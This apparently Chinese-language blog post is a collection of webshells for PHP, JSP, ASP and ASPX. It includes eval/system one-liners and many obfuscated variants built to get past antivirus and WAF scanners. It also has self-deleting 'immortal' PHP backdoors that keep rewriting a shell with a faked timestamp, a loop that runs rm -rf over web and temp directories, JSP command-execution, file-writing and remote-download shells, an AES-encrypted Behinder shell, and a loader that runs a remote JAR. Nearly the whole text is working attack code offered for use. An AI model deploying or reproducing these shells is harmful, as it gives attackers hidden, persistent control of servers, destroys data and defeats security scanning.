👴的养马场

PHP

简单一句话

1
2
3
<?php eval($_POST["Du1"]);phpinfo(); ?>
<?php @system($_GET["Du1"]); ?>
<?php usort($_GET,'asse'.'rt');?> // ?1=1+1&2=eval($_POST[x])

免杀

简单免杀

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
$a = $GLOBALS;
$str = '_POST';
eval/**nice**/(''. $a[$str]['cf87efe0c36a12aec113cd7982043573']. NULL);
?>

<?php
$a = str_replace("b", "", "absbsbebrbt");
$a($_POST['Du1']);
?>

<?php
function fun(){return $_POST['Du1'];}
@preg_replace("/test/e", fun(), "testtesttest");
?>

<?php
$a = array('a','s','e','r','t');
$b = '_GET';
($a[0].$a[1].$a[1].$a[2].$a[3].$a[4])($$b['Du1']);

<?php
$a = substr_replace("assexx","rt",4);
$b=[''=>$a($_POST['Du1'])];
?>

异或

1
<?php $a = (''^'`').(''^'`').(''^'`').(''^'`');$__='_'.('\''^'`').('%'^'`').('4'^'`');$___ = $$__;@eval($___['_']);?>
异或转码数据
1
2
3
4
5
6
7
8
9
10
11
12
<?php
$a = (''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(' '^'`').('
'^'`').(' '^'`').(' '^'`').('
'^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`');
$b = ('!'^'`').('"'^'`').('#'^'`').('$'^'`').('%'^'`').('&'^'`').('\''^'`').('('^'`').(')'^'`').('*'^'`').('+'^'`').(','^'`').('-'^'`').('.'^'`').('/'^'`').('0'^'`').('1'^'`').('2'^'`').('3'^'`').('4'^'`').('5'^'`').('6'^'`').('7'^'`').('8'^'`').('9'^'`').(':'^'`');
$c =(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').('
'^']').(' '^']').(''^']').(''^']').(' '^']').(''^']').(' '^']').('
'^']').(''^']').(''^']').(''^']');
echo $a;
echo $b;
echo $c;
?>

随机异或

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
class VONE {
function HALB() {
$rlf = 'B' ^ "\x23";
$fzq = 'D' ^ "\x37";
$fgu = 'h' ^ "\x1b";
$sbe = 'R' ^ "\x37";
$gba = 'H' ^ "\x3a";
$oya = 'Y' ^ "\x2d";
$MWUC = $rlf . $fzq . $fgu . $sbe . $gba . $oya;
return $MWUC;}function __destruct() {
$RNUJ = $this->HALB();
@$RNUJ($this->HY);
}
}
$vone = new VONE();
@$vone->HY = isset($_GET['duitu']) ? base64_decode($_POST['Du1']) : $_POST['Du1'];
?>

取反

1
2
3
4
5
6
7
8
<?php
$__=('>'>'<')+('>'>'<');
$_=$__/$__;
$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
$_=$$_____;
$____($_[$__]);

自增

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
<?php
/*$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);*/


$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++; // E
$____=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // V
$____.=$__;
$____.=$___;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // L
$____.=$__;

$___='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$_=$$___;
$____($_GET['xg']); // ASSERT($_POST[_]);
?>

无数字

1
2
3
4
5
6
<?php
$_=chr(floor(pow(pi(),ceil(pi())))).chr(floor(pow(pi(),ceil(pi()))+ceil(pi()*pi()+pi()+pi())+true)).chr(floor(pow(pi(),ceil(pi()))+ceil(pi()*pi()+pi()+pi())+true)).chr(floor(pow(pi(),ceil(pi()))+ceil(pi()))).chr(floor(pow(pi(),ceil(pi()))+ceil(pi()*pi()+pi()+pi()))).chr(floor(pow(pi(),ceil(pi()))+ceil(pi()*pi()+pi())+ceil(pi())+true));
$__='_'.chr( floor(pow(ceil(pi()),pi())-ceil(pi()+true+true))).chr(floor(pow(ceil(pi()),pi())-ceil(pi()+pi())-true)).chr(floor(pow(ceil(pi()),pi())+pow(pi()-true,pi()-true)+true+true));
$___=$$__;
$_($___[_]);
?>

QQQ

1
2
3
4
5
6
7
8
9
<?php
/**
* Noticed: (PHP 5 >= 5.3.0, PHP 7)
* Referer: https://www.duitutu.cn/assnmsl
*/
$password = "duitutu.cn";
$bypass = substr($_SERVER["HTTP_REFERER"],-7,-4);
forward_static_call_array($bypass."ert", array($_REQUEST[$password]));
?>

QQQQQ

shell.php

1
2
3
4
5
6
7
8
9
10
11
<?php
set_time_limit(1);
ignore_user_abort(true);
$file = 'phpinfo.php';
$shell =
"PD9waHAKCSRzdHIxID0gJ2FIKFVVSChmc2RmSChVVUgoZnNkZixmZGdkZWZqZzBKKXImJUYlKl5HKnQnOwoJJHN0cjIgPSBzdHJ0cigkc3RyMSxhcnJheSgnYUgoVVVIKGZzZGZIKFVVSChmc2RmLCc9PidhcycsJ2ZkZ2RlZmpnMEopJz0+J3NlJywnciYlRiUqXkcqdCc9PidydCcpKTsKCSRzdHIzID0gc3RydHIoJHN0cjIsYXJyYXkoJ3MsJz0+J3MnLCdmZGdkZWZqZzBKKXImJUYlKl5HKic9PidlcicpKTsKCWlmKG1kNShAJF9HRVRbJ2EnXSkgPT0nZTEwYWRjMzk0OWJhNTlhYmJlNTZlMDU3ZjIwZjg4M2UnKXsKCQkkc3RyNCA9IHN0cnJldigkX1BPU1RbJ2EnXSk7CgkJJHN0cjUgPSBzdHJyZXYoJHN0cjQpOwoJCSRzdHIzKCRzdHI1KTsKICAgIH0KPz4=";
while(true){
file_put_contents($file,base64_decode($shell));
usleep(50);
}
?>

phpinfo.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php

$str1 = 'aH(UUH(fsdfH(UUH(fsdf,fdgdefjg0J)r&%F%*^G*t';

$str2 = strtr($str1,array('aH(UUH(fsdfH(UUH(fsdf,'=>'as','fdgdefjg0J)'=>'se','r&%F%*^G*t'=>'rt'));

$str3 = strtr($str2,array('s,'=>'s','fdgdefjg0J)r&%F%*^G*'=>'er'));

if(md5(@$_GET['a']) =='e10adc3949ba59abbe56e057f20f883e'){

$str4 = strrev($_POST['a']);

$str5 = strrev($str4);

$str3($str5);

}
// e10adc3949ba59abbe56e057f20f883e的md5解密为123456,即密码
?>

绕 waf

读取目录

1
<?php @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();

写🐎

1
<?php @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='/var/www/html/shell.php';$c=$_POST["Du1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();

内存不死🐎

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
set_time_limit(0);
ignore_user_abort(true);
unlink(__FILE__);
$file = '/var/www/html/.shell.php';
//$file = 'D:\phpstudy_pro\WWW\h\.shell.php';
$code = '<?php if(md5($_POST["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@eval($_POST[\'Du1\']);}?>';
while (1) {
file_put_contents($file, $code);
system('touch -m -d "2014-10-31 13:50:11" .shell.php');
usleep(1000);
}
?>

372a1b33f1178a24810b45076f907767

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php

// 絕世好馬

/*

1. write .htaccess to prevent any execution from web
2. rm every thing in web dir (/tmp dir and /var/tmp dir)
3. link flag to web path

*/

ignore_user_abort(true);
set_time_limit(0);

//config
$web_path = "/var/www/html/";
$hash_1 = "93ca52b2614926880c319db1ac5b1380";
$flag_link = $web_path . '/' . $hash_1.".png";
$htaccess_file = '.htaccess';
$flag_path = "/flag";
$htaccess = '<FilesMatch ".+\.ph(p[3457]?|t|tml)$">
Deny from all
</FilesMatch>';

unlink(__FILE__);
while (TRUE) {{
system('rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/*');
$files = scandir($web_path);
$res = 'rm -rf';
foreach ($files as $file) {
if($file != '.' && $file != '..' && $file != $htaccess_file && $file != $hash_1.".png"){
$res = $res . ' ' .$file;
}
}
system($res);
if (file_get_contents($htaccess_file)!==$htaccess) {{
system('chmod +w '.$htaccess_file);
file_put_contents($htaccess_file, $htaccess);
system('chmod -w '.$htaccess_file);
}}
system('ln -s '.$flag_path.' '.$flag_link);
system('chmod -w '.$flag_link);
usleep(5);
}}
?>

JSP

执行系统命令

无回显执行系统命令

1
<%Runtime.getRuntime().exec(request.getParameter("Du1"));%>

有回显带密码验证

1
2
3
4
5
6
7
8
9
10
11
12
<%
if("023".equals(request.getParameter("passwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("Du1")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>

把字符串编码后写入指定文件

1.

1
2
3
<%new java.io.FileOutputStream(request.getParameter("file")).write(request.getParameter("str").getBytes());%>

<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("file")).write(request.getParameter("str").getBytes());%>

2.

1
2
3
<%new java.io.RandomAccessFile(request.getParameter("file"),"rw").write(request.getParameter("str").getBytes()); %>

<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>

下载远程文件

1
2
3
4
5
6
7
8
9
10
<%
java.io.InputStream in = new java.net.URL(request.getParameter("url")).openStream();
byte[] b = new byte[1024];
java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
int a = -1;
while ((a = in.read(b)) != -1) {
baos.write(b, 0, a);
}
new java.io.FileOutputStream(request.getParameter("file")).write(baos.toByteArray());
%>

直接下载到 web 路径下:

1
2
3
4
5
6
7
8
9
10
<%
java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
byte[] b = new byte[1024];
java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
int a = -1;
while ((a = in.read(b)) != -1) {
baos.write(b, 0, a);
}
new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray());
%>

免杀

命令执行 Jsp bypass D盾 & 百度scanner

Base64
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
BASE64Decoder decoder = new BASE64Decoder();
Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
Process e = (Process)
rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
Object[]{}), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
ASCII
1
2
3
4
5
6
7
8
9
10
<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%
if(request.getParameter("cmd")!=null){
Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }));
Process e = (Process) rt.getMethod(new String(new byte[] { 101, 120, 101, 99 }), String.class).invoke(rt.getMethod(new String(new byte[] { 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 })).invoke(null), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -1;byte[] b = new byte[2048];out.print("<pre>");
while((a=in.read(b))!=-1){ out.println(new String(b)); }out.print("</pre>");
}
%>
HEX
1
2
3
4
5
6
7
8
9
10
<%@ page contentType="text/html;charset=UTF-8" import="javax.xml.bind.DatatypeConverter" language="java" %>
<%
if(request.getParameter("cmd")!=null){
Class rt = Class.forName(new String(DatatypeConverter.parseHexBinary("6a6176612e6c616e672e52756e74696d65")));
Process e = (Process) rt.getMethod(new String(DatatypeConverter.parseHexBinary("65786563")), String.class).invoke(rt.getMethod(new String(DatatypeConverter.parseHexBinary("67657452756e74696d65"))).invoke(null), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -1;byte[] b = new byte[2048];out.print("<pre>");
while((a=in.read(b))!=-1){ out.println(new String(b)); }out.print("</pre>");
}
%>

冰蝎 Jsp bypass D盾 & 百度scanner

1
2
3
4
5
6
7
8
9
10
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}
public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
<%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);
out.print(k);return;}
Cipher c=Cipher.getInstance("AES");
SecretKeySpec sec=new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES");
c.init(2,sec);
String uploadString= request.getReader().readLine();
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(uploadString))).newInstance().equals(pageContext);%>

反射调用外部 Jar

直接用了某位师傅实现了的远程加载类,改天自己搭一下吧。

1
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>

使用方法:?u=http://javaweb.org/Cat.jar&023=A

大🐎

太大了,不好放,丢自己本地了

ASP

一句话

1
2
<%eval request("_")%>
<%execute(request("Du1"))%>

一些简单Bypass

1
2
3
<%a=request("Du1")%><%eval a%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("Du1"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"1"&"-"&"1"&")"&")")%> // 密码:-2

ASPX

一句话

1
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"Du1"));%>